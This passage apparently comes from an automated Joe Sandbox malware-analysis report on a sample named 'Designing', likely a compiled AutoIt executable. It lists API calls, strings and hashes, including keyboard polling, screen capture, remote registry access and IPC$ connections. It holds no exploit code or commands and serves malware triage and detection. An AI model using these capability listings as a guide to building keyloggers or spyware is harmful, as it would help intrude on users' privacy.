                                              • Instruction ID: a0381bdeddfcf33105abc5a456cfb0d42e9b8be2aabba82532df1718f9849d4d
                                              • Opcode Fuzzy Hash: 5f9c176dc7b9e523ca099014581e339f3f60823068c553e105a232a35ecc9540
                                              • Instruction Fuzzy Hash: 4A816971208305AFD721DF14C985EBABBE8FB88354F1049ADF99597291CBB0D905CBA2
                                              APIs
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B88E3C
                                                • Part of subcall function 00B88E20: GetLastError.KERNEL32(?,00B88900,?,?,?), ref: 00B88E46
                                                • Part of subcall function 00B88E20: GetProcessHeap.KERNEL32(00000008,?,?,00B88900,?,?,?), ref: 00B88E55
                                                • Part of subcall function 00B88E20: HeapAlloc.KERNEL32(00000000,?,00B88900,?,?,?), ref: 00B88E5C
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B88E73
                                                • Part of subcall function 00B88EBD: GetProcessHeap.KERNEL32(00000008,00B88916,00000000,00000000,?,00B88916,?), ref: 00B88EC9
                                                • Part of subcall function 00B88EBD: HeapAlloc.KERNEL32(00000000,?,00B88916,?), ref: 00B88ED0
                                                • Part of subcall function 00B88EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B88916,?), ref: 00B88EE1
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B88B2E
                                              • _memset.LIBCMT ref: 00B88B43
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B88B62
                                              • GetLengthSid.ADVAPI32(?), ref: 00B88B73
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00B88BB0
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B88BCC
                                              • GetLengthSid.ADVAPI32(?), ref: 00B88BE9
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B88BF8
                                              • HeapAlloc.KERNEL32(00000000), ref: 00B88BFF
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B88C20
                                              • CopySid.ADVAPI32(00000000), ref: 00B88C27
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B88C58
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B88C7E
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B88C92
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 6842b352247ccab0e2be2583c1cf08f9810c5a6d34dddbd1fdbafe3c8a4368ed
                                              • Instruction ID: a8fce67dd3d5df9d6bc33c86cbf670bd6789280cacac99064442300027f39474
                                              • Opcode Fuzzy Hash: 6842b352247ccab0e2be2583c1cf08f9810c5a6d34dddbd1fdbafe3c8a4368ed
                                              • Instruction Fuzzy Hash: 57613B71900209EFDF10AF95DC45EAEBBB9FF08300F4481A9F915A72A0DB759A15CF60
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00BA7A79
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BA7A85
                                              • CreateCompatibleDC.GDI32(?), ref: 00BA7A91
                                              • SelectObject.GDI32(00000000,?), ref: 00BA7A9E
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BA7AF2
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BA7B2E
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BA7B52
                                              • SelectObject.GDI32(00000006,?), ref: 00BA7B5A
                                              • DeleteObject.GDI32(?), ref: 00BA7B63
                                              • DeleteDC.GDI32(00000006), ref: 00BA7B6A
                                              • ReleaseDC.USER32(00000000,?), ref: 00BA7B75
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: 02ba219a32f1d6d428cc4fe9476e886200376270b0325deedd71b48acdcb2bae
                                              • Instruction ID: 8321a3b26f511a6145479dfd57e3c14b049f97e1ed1d99d7cb7fade3a780214a
                                              • Opcode Fuzzy Hash: 02ba219a32f1d6d428cc4fe9476e886200376270b0325deedd71b48acdcb2bae
                                              • Instruction Fuzzy Hash: F3514D71948309EFCB14DFA8CC85EAEBBF9EF49310F14845DF959A7250DB31A9418B60
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B9A4D4
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B9A4F6
                                              • __swprintf.LIBCMT ref: 00B9A54F
                                              • __swprintf.LIBCMT ref: 00B9A568
                                              • _wprintf.LIBCMT ref: 00B9A61E
                                              • _wprintf.LIBCMT ref: 00B9A63C
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-2391861430
                                              APIs
                                                • Part of subcall function 00B9951A: __time64.LIBCMT ref: 00B99524
                                                • Part of subcall function 00B44A8C: _fseek.LIBCMT ref: 00B44AA4
                                              • __wsplitpath.LIBCMT ref: 00B997EF
                                                • Part of subcall function 00B5431E: __wsplitpath_helper.LIBCMT ref: 00B5435E
                                              • _wcscpy.LIBCMT ref: 00B99802
                                              • _wcscat.LIBCMT ref: 00B99815
                                              • __wsplitpath.LIBCMT ref: 00B9983A
                                              • _wcscat.LIBCMT ref: 00B99850
                                              • _wcscat.LIBCMT ref: 00B99863
                                                • Part of subcall function 00B99560: _memmove.LIBCMT ref: 00B99599
                                                • Part of subcall function 00B99560: _memmove.LIBCMT ref: 00B995A8
                                              • _wcscmp.LIBCMT ref: 00B997AA
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DE1
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DF4
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B99A0D
                                              • _wcsncpy.LIBCMT ref: 00B99A80
                                              • DeleteFileW.KERNEL32(?,?), ref: 00B99AB6
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B99ACC
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B99ADD
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B99AEF
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              APIs
                                              • _memset.LIBCMT ref: 00B45BF1
                                              • GetMenuItemCount.USER32(00BF7890), ref: 00B80E7B
                                              • GetMenuItemCount.USER32(00BF7890), ref: 00B80F2B
                                              • GetCursorPos.USER32(?), ref: 00B80F6F
                                              • SetForegroundWindow.USER32(00000000), ref: 00B80F78
                                              • TrackPopupMenuEx.USER32(00BF7890,00000000,?,00000000,00000000,00000000), ref: 00B80F8B
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B80F97
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 2751501086-0
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • _memset.LIBCMT ref: 00B88489
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B884BE
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B884DA
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B884F6
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B88520
                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B88548
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B88553
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B88558
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 1411258926-22481851
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                                • Part of subcall function 00B4153B: _memmove.LIBCMT ref: 00B415C4
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B958EB
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B95901
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B95912
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B95924
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B95935
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              APIs
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              APIs
                                              • timeGetTime.WINMM ref: 00B95535
                                                • Part of subcall function 00B50859: timeGetTime.WINMM(?,00000002,00B3C22C), ref: 00B5085D
                                              • Sleep.KERNEL32(0000000A), ref: 00B95561
                                              • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00B95585
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B955A7
                                              • SetActiveWindow.USER32 ref: 00B955C6
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B955D4
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B955F3
                                              • Sleep.KERNEL32(000000FA), ref: 00B955FE
                                              • IsWindow.USER32 ref: 00B9560A
                                              • EndDialog.USER32(00000000), ref: 00B9561B
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • CoInitialize.OLE32(00000000), ref: 00B9DC2D
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B9DCC0
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00B9DCD4
                                              • CoCreateInstance.OLE32(00BC3D4C,00000000,00000001,00BEB86C,?), ref: 00B9DD20
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B9DD8F
                                              • CoTaskMemFree.OLE32(?,?), ref: 00B9DDE7
                                              • _memset.LIBCMT ref: 00B9DE24
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00B9DE60
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B9DE83
                                              • CoTaskMemFree.OLE32(00000000), ref: 00B9DE8A
                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B9DEC1
                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00B9DEC3
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00B90896
                                              • SetKeyboardState.USER32(?), ref: 00B90901
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00B90921
                                              • GetKeyState.USER32(000000A0), ref: 00B90938
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00B90967
                                              • GetKeyState.USER32(000000A1), ref: 00B90978
                                              • GetAsyncKeyState.USER32(00000011), ref: 00B909A4
                                              • GetKeyState.USER32(00000011), ref: 00B909B2
                                              • GetAsyncKeyState.USER32(00000012), ref: 00B909DB
                                              • GetKeyState.USER32(00000012), ref: 00B909E9
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00B90A12
                                              • GetKeyState.USER32(0000005B), ref: 00B90A20
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00B8CE1C
                                              • GetWindowRect.USER32(00000000,?), ref: 00B8CE2E
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B8CE8C
                                              • GetDlgItem.USER32(?,00000002), ref: 00B8CE97
                                              • GetWindowRect.USER32(00000000,?), ref: 00B8CEA9
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B8CEFD
                                              • GetDlgItem.USER32(?,000003E9), ref: 00B8CF0B
                                              • GetWindowRect.USER32(00000000,?), ref: 00B8CF1C
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B8CF5F
                                              • GetDlgItem.USER32(?,000003EA), ref: 00B8CF6D
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B8CF8A
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00B8CF97
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: 253a85ddad3b0fb1a13398891de018bc5122eccedf4922c5e08bd06f0e3a5b5b
                                              • Instruction ID: dda0a323f66425b8c8e9273c67ba75e956702fd607310f4ce3206394ef716200
                                              • Opcode Fuzzy Hash: 253a85ddad3b0fb1a13398891de018bc5122eccedf4922c5e08bd06f0e3a5b5b
                                              • Instruction Fuzzy Hash: 02516FB1B10205AFDB18DF68CD89EAEBBF6EB88311F148169F615D7290DB70AD04CB10
                                              APIs
                                                • Part of subcall function 00B31F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B32412,?,00000000,?,?,?,?,00B31AA7,00000000,?), ref: 00B31F76
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B324AF
                                              • KillTimer.USER32(-00000001,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B3254A
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00B6BFE7
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B6C018
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B6C02F
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B6C04B
                                              • DeleteObject.GDI32(00000000), ref: 00B6C05D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: 4ce68b8fc7c217c59dd742707f28cf243f1ab1f11819dc7232b78aa6744b236d
                                              • Instruction ID: c0e60bc0aef4f8b96d263b7a8e519667e89beba16c3a11acdebea3277a9c064d
                                              • Opcode Fuzzy Hash: 4ce68b8fc7c217c59dd742707f28cf243f1ab1f11819dc7232b78aa6744b236d
                                              • Instruction Fuzzy Hash: C7618931164601DFDB25AF19D988B3ABBF1FB44316F2085E9E18687A60CB75BC90DF90
                                              APIs
                                                • Part of subcall function 00B329AB: GetWindowLongW.USER32(?,000000EB), ref: 00B329BC
                                              • GetSysColor.USER32(0000000F), ref: 00B325AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: b5ba33a40c3d758f071f149240bae6d6e309ccebf730e587b4f683e182014f3e
                                              • Instruction ID: 3634e901716a4e40258351c00475058912a610f7f855036956d476afe940fd21
                                              • Opcode Fuzzy Hash: b5ba33a40c3d758f071f149240bae6d6e309ccebf730e587b4f683e182014f3e
                                              • Instruction Fuzzy Hash: AD41B131004140EFDB256F289C99BB93BA5EF1A335F2942E1FDA68B1E1CB348D41DB21
                                              APIs
                                                • Part of subcall function 00B50B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B42A3E,?,00008000), ref: 00B50BA7
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B42ADF
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B42C2C
                                                • Part of subcall function 00B43EBE: _wcscpy.LIBCMT ref: 00B43EF6
                                                • Part of subcall function 00B5386D: _iswctype.LIBCMT ref: 00B53875
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-3738523708
                                              • Opcode ID: db03ef046bba3ba051e74af754e314147e6e103720a8003206fa483abf445d6e
                                              • Instruction ID: cc9b7c7fd1748b5b4df79ea90ba7f32281670a6b6c46b048d43e699663a2fb6f
                                              • Opcode Fuzzy Hash: db03ef046bba3ba051e74af754e314147e6e103720a8003206fa483abf445d6e
                                              • Instruction Fuzzy Hash: 9C02F8305083419FC724EF24C881AAFBBE5FF99350F0449ADF499972A2DB30DA49DB42
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,00BC0980), ref: 00B9AF4E
                                              • GetDriveTypeW.KERNEL32(00000061,00BEB5F0,00000061), ref: 00B9B018
                                              • _wcscpy.LIBCMT ref: 00B9B042
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 8071e3ac3ac6f189d4f254b9f2250df197c57bf7e1846fd1a5cf7f32d1ab3608
                                              • Instruction ID: 728d878d4cf7a3a303c46277aae4a308437d779de0937fa0d9126593e7a440b4
                                              • Opcode Fuzzy Hash: 8071e3ac3ac6f189d4f254b9f2250df197c57bf7e1846fd1a5cf7f32d1ab3608
                                              • Instruction Fuzzy Hash: 7951D2311183059BCB10EF14D991FABB7E5FF94704F2048ADF895972A2DB31ED09CA92
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: b3219f8d28da9bbc77b96de0515174d9b3c1c335a6f0ad6ed470dbc4d1963e4f
                                              • Instruction ID: 8e3ba9493ba1a5b632c451160b8b9673446baac379a590c0fda47508c6d73b03
                                              • Opcode Fuzzy Hash: b3219f8d28da9bbc77b96de0515174d9b3c1c335a6f0ad6ed470dbc4d1963e4f
                                              • Instruction Fuzzy Hash: 9A41B671A08209AFDB24DF78D981F7A73E8EB45300F3448EEE549D7291EB75AD458B10
                                              APIs
                                              • _memset.LIBCMT ref: 00BB778F
                                              • CreateMenu.USER32 ref: 00BB77AA
                                              • SetMenu.USER32(?,00000000), ref: 00BB77B9
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB7846
                                              • IsMenu.USER32(?), ref: 00BB785C
                                              • CreatePopupMenu.USER32 ref: 00BB7866
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB7893
                                              • DrawMenuBar.USER32 ref: 00BB789B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: ff2881bfffea13bf6b0af4ba95ea2311a8666c0c131d607139fb367e980c0252
                                              • Instruction ID: d244d7ae2fc62bde93ca1070d630585565f64068a4aa6934406db4d80ba34e6f
                                              • Opcode Fuzzy Hash: ff2881bfffea13bf6b0af4ba95ea2311a8666c0c131d607139fb367e980c0252
                                              • Instruction Fuzzy Hash: 8B412374A10209EFDB10DF65D888EEABBF5FF89310F1441A9E946A7360DB70A910DF50
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BB7B83
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BB7B8A
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BB7B9D
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BB7BA5
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BB7BB0
                                              • DeleteDC.GDI32(00000000), ref: 00BB7BB9
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB7BC3
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BB7BD7
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BB7BE3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
